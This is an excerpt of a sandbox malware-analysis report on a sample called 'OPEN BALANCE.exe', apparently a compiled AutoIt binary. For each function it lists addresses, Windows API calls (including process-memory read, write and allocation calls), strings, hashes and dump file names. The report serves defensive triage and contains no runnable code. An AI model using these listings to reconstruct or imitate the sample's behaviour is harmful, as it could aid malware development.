Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: e4286f0a5db2c6e6d7857d43045cd4d9dff0d2b04fe988e12c414e4c0d77c7cb
Instruction ID: 504f6dca5beab07097026353e0a0e7080028491e014e343bb72f113e8354076f
Opcode Fuzzy Hash: e4286f0a5db2c6e6d7857d43045cd4d9dff0d2b04fe988e12c414e4c0d77c7cb
Instruction Fuzzy Hash: 8B018170501B05ABFB205B50ED4EFA677B8FB11B15F00175EE683E18E1DBF4A984CA91

Function 008722A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008722BE

Part of subcall function 008729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000), ref: 008729DE
Part of subcall function 008729C8: GetLastError.KERNEL32(00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000,00000000), ref: 008729F0

_free.LIBCMT ref: 008722D0
_free.LIBCMT ref: 008722E3
_free.LIBCMT ref: 008722F4
_free.LIBCMT ref: 00872305

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ebda9a38504068ae9ba5d03b8724261b31f9498fc09973c416d3f4b282ea0621
Instruction ID: b9af7b34fff479d7019f13c8b15b5ab2add23eec2a535b7a4cbdd3e8a12ec8bf
Opcode Fuzzy Hash: ebda9a38504068ae9ba5d03b8724261b31f9498fc09973c416d3f4b282ea0621
Instruction Fuzzy Hash: CAF030B05291119BC712AF68BD02E887F64F718751B05CA06F518D23B9C7768492FBA5

Function 008595C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008595D4
StrokeAndFillPath.GDI32(?,?,008971F7,00000000,?,?,?), ref: 008595F0
SelectObject.GDI32(?,00000000), ref: 00859603
DeleteObject.GDI32 ref: 00859616
StrokePath.GDI32(?), ref: 00859631

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 28a7d0d759600ad485ff25590a59d44a0a097b87651090a189380fdee7daccbe
Instruction ID: 286d91f559947828e0b2e27686ed04d90d510e56b00b579332f3f933d0f98e88
Opcode Fuzzy Hash: 28a7d0d759600ad485ff25590a59d44a0a097b87651090a189380fdee7daccbe
Instruction Fuzzy Hash: 48F0193011A609EBDF125F65ED187A43BA1FB10362F448315FA65950F0D73089A9EF20

Function 008A1874 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 008A187F
CloseHandle.KERNEL32(?), ref: 008A1894
CloseHandle.KERNEL32(?), ref: 008A189C
GetProcessHeap.KERNEL32(00000000,?), ref: 008A18A5
HeapFree.KERNEL32(00000000), ref: 008A18AC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessSingleWait
String ID:
API String ID: 3751786701-0
Opcode ID: d0afe6d1d4be44635491d01b63472cf46203e7d3b1417b1723295d807e728e36
Instruction ID: a11474e469721e7a26b2f208248732b565c0ca3b51718db561ab50e077038711
Opcode Fuzzy Hash: d0afe6d1d4be44635491d01b63472cf46203e7d3b1417b1723295d807e728e36
Instruction Fuzzy Hash: 88E0E536045112FBDB016FA5ED0C90AFF39FF49B22B108322F225811B0CB329420DF50

Function 00870F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 008710F9
__freea.LIBCMT ref: 00871117

Part of subcall function 00871537: _free.LIBCMT ref: 0087154F

Strings

a/p, xrefs: 008711DE
am/pm, xrefs: 0087117A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 3b01a1bf8ffe237616d01b685b3c11950cc194373359be5d952620c2f11f30e2
Instruction ID: 202f8ad519f2b60dbbf7fbd5fc7f8dc2bd065ad9114f7665ee51491628e24e28
Opcode Fuzzy Hash: 3b01a1bf8ffe237616d01b685b3c11950cc194373359be5d952620c2f11f30e2
Instruction Fuzzy Hash: 71D1E03191020ACADF248F6CC89DABAB7B5FF15704F288119E509EBE59D339DD80CB61

Function 008B910C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00847620: _wcslen.LIBCMT ref: 00847625

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

_wcslen.LIBCMT ref: 008B9506
_wcslen.LIBCMT ref: 008B952D
7516D1A0.COMDLG32(00000058), ref: 008B9585

Strings

X, xrefs: 008B9412

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$7516
String ID: X
API String ID: 252919825-3081909835
Opcode ID: a7a397318e6eecda7182d76950e3faac02d0d4a93b9d57b19bffb200a370e377
Instruction ID: c92ed213e3a8ab74205727800427da1735fd14bef51ffca0327b871b6e556ee8
Opcode Fuzzy Hash: a7a397318e6eecda7182d76950e3faac02d0d4a93b9d57b19bffb200a370e377
Instruction Fuzzy Hash: E4E18D319083448FD724DF28C881AAAB7E4FF85314F15896DE999DB3A2DB31DD05CB92

Function 008C7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00860242: RtlEnterCriticalSection.NTDLL(0091070C), ref: 0086024D
Part of subcall function 00860242: RtlLeaveCriticalSection.NTDLL(0091070C), ref: 0086028A

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008600A3: __onexit.LIBCMT ref: 008600A9

__Init_thread_footer.LIBCMT ref: 008C7BFB

Part of subcall function 008601F8: RtlEnterCriticalSection.NTDLL(0091070C), ref: 00860202
Part of subcall function 008601F8: RtlLeaveCriticalSection.NTDLL(0091070C), ref: 00860235

Strings

Variable must be of type 'Object'., xrefs: 008C7C3A
5, xrefs: 008C7C78
G, xrefs: 008C7C7F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: e09c54e1cbc6e880eae1db54a3aca2ec7bb633d0f0d6facf9873d6328f259823
Instruction ID: ae8ed172a12cd6aadb02f96ac5ac27dca608d023a4070672789442b087de14fe
Opcode Fuzzy Hash: e09c54e1cbc6e880eae1db54a3aca2ec7bb633d0f0d6facf9873d6328f259823
Instruction Fuzzy Hash: 0E914670A04209AFCB14EF98D891EADB7B1FF49304F10815DF9069B292DB71EE85DB52

Function 008A2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008AB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008A21D0,?,?,00000034,00000800,?,00000034), ref: 008AB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008A2760

Part of subcall function 008AB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008A21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 008AB3F8

Part of subcall function 008AB32A: GetWindowThreadProcessId.USER32(?,?), ref: 008AB355
Part of subcall function 008AB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008A2194,00000034,?,?,00001004,00000000,00000000), ref: 008AB365
Part of subcall function 008AB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008A2194,00000034,?,?,00001004,00000000,00000000), ref: 008AB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008A27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008A281A

Strings

@, xrefs: 008A2832

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: fc7692e3da63493b7d9504be5ac240b45e9ea4212fd32420014924900980352d
Instruction ID: 6e84badf8fe17f524245d96c9215131071923775bdf3dc03848a8b93ff8a1700
Opcode Fuzzy Hash: fc7692e3da63493b7d9504be5ac240b45e9ea4212fd32420014924900980352d
Instruction Fuzzy Hash: 62412E72901218AFDB10DFA8CD45ADEBBB8FF0A700F104059FA55B7181DB746E45CB61

Function 008A719E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008A723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008A724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008A72CF

Strings

DllGetClassObject, xrefs: 008A7242

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorMode$AddressProc
String ID: DllGetClassObject
API String ID: 1548245697-1075368562
Opcode ID: 72ddb47a240c3e50ea7ef8700c5ff794a602592db7bfdae29286632208679c62
Instruction ID: 05eba431893c47266acfd4f37aa1e7f9314906dadb66050157cb007b2879f1e9
Opcode Fuzzy Hash: 72ddb47a240c3e50ea7ef8700c5ff794a602592db7bfdae29286632208679c62
Instruction Fuzzy Hash: 59418E71604205AFEB15CF54CC84B9A7BB9FF46314F1481AABD06DF20AD7B0D945EBA0

Function 0087172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\OPEN BALANCE.exe,00000104), ref: 00871769
_free.LIBCMT ref: 00871834
_free.LIBCMT ref: 0087183E

Strings

C:\Users\user\Desktop\OPEN BALANCE.exe, xrefs: 00871760, 00871767, 00871796, 008717CE

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\OPEN BALANCE.exe
API String ID: 2506810119-1995741856
Opcode ID: a831b075aea5f6d070891dc48ee52d44f2c52ea7b846462125eccc8b04ef83e3
Instruction ID: a26a8ab4578fbfbf8714bddca876d7188e3eb17277bcc220e3e3cc3b7e50ebd9
Opcode Fuzzy Hash: a831b075aea5f6d070891dc48ee52d44f2c52ea7b846462125eccc8b04ef83e3
Instruction Fuzzy Hash: 8C319D71A04218ABDF21DF9D9889E9EBBFCFB85350B148166E908D7619D6B0CA40CB91

Function 008AC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008AC306
DeleteMenu.USER32(?,00000007,00000000), ref: 008AC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00911990,01502718), ref: 008AC395

Strings

0, xrefs: 008AC2DF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 1935ff95880de1e62bf52c9d3f2868bd2147775e4922536dbe963855a2193227
Instruction ID: 5a27a97daf8c540ac8c90dc3c877dafb541408d5b255061a947057f4774085af
Opcode Fuzzy Hash: 1935ff95880de1e62bf52c9d3f2868bd2147775e4922536dbe963855a2193227
Instruction Fuzzy Hash: 26418F312083019FEB24DF29D845B5ABBE8FF86314F14865DF9A5D7391D770A904CB52

Function 008D4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008DCC08,00000000,?,?,?,?), ref: 008D44AA
GetWindowLongW.USER32 ref: 008D44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008D44D7

Strings

SysTreeView32, xrefs: 008D447C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 32d3152628f05482a7e04ffcf87cb5ca6c4abc1eed1b6fa0ab42a3dc027b8c3f
Instruction ID: 7b9af91c9ed147eb51449d3fb042d15be28341dc329357a2b1be7f3b6c84216e
Opcode Fuzzy Hash: 32d3152628f05482a7e04ffcf87cb5ca6c4abc1eed1b6fa0ab42a3dc027b8c3f
Instruction Fuzzy Hash: 60317C31211606AFDB208E38EC45BEA7BAAFB08334F205716F975E22D0D770EC909750

Function 008C304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008C335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,008C3077,?,?), ref: 008C3378

inet_addr.WS2_32(?), ref: 008C307A
_wcslen.LIBCMT ref: 008C309B
htons.WS2_32(00000000), ref: 008C3106

Strings

255.255.255.255, xrefs: 008C3095, 008C309A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 47f5319ce1c76fc17d381385716d8c2cbbfc04c73a2c1260da62f0e639df7a83
Instruction ID: d1836353885a71d165b9e98bd3350ef65582d6085628656c1d8e8e2e3fe4e51c
Opcode Fuzzy Hash: 47f5319ce1c76fc17d381385716d8c2cbbfc04c73a2c1260da62f0e639df7a83
Instruction Fuzzy Hash: AD316B366042059FCB20CF68C585FAA77B0FF54318F29C15AE916CB292DB72EE46C761

Function 008D4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008D4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008D4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008D471A

Strings

msctls_updown32, xrefs: 008D4684

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 83d6b30236ad8de69a5dea0660fca920075a546e2fa945c512780cae1caa204b
Instruction ID: 6cbf4edb28fc866ff116c5e50f540e491dd39db789c945796645b073cf1bd3d4
Opcode Fuzzy Hash: 83d6b30236ad8de69a5dea0660fca920075a546e2fa945c512780cae1caa204b
Instruction Fuzzy Hash: EC218EB5604209AFEB10DF68ECC1DA737ADFB5A3A4B00114AFA01DB391DB30EC11CA61

Function 008A95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008A961D

Strings

#OnAutoItStartRegister, xrefs: 008A95F3
#notrayicon, xrefs: 008A95B7
#requireadmin, xrefs: 008A95D9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 9686bf76d90b5363d4a01544c36142112ecb44853b7dfe40e27e5fe7ac5d6f6f
Instruction ID: 8406dbaac1a70e1145ccd2b345d364696742f6a53e44f0eb36065ebf592494a7
Opcode Fuzzy Hash: 9686bf76d90b5363d4a01544c36142112ecb44853b7dfe40e27e5fe7ac5d6f6f
Instruction Fuzzy Hash: AB215B32508114A6E331AB289C03FBB73D8FF62314F104426FA8AD7982EB559D51C296

Function 008D37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008D3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008D3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008D3876

Strings

Listbox, xrefs: 008D380F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

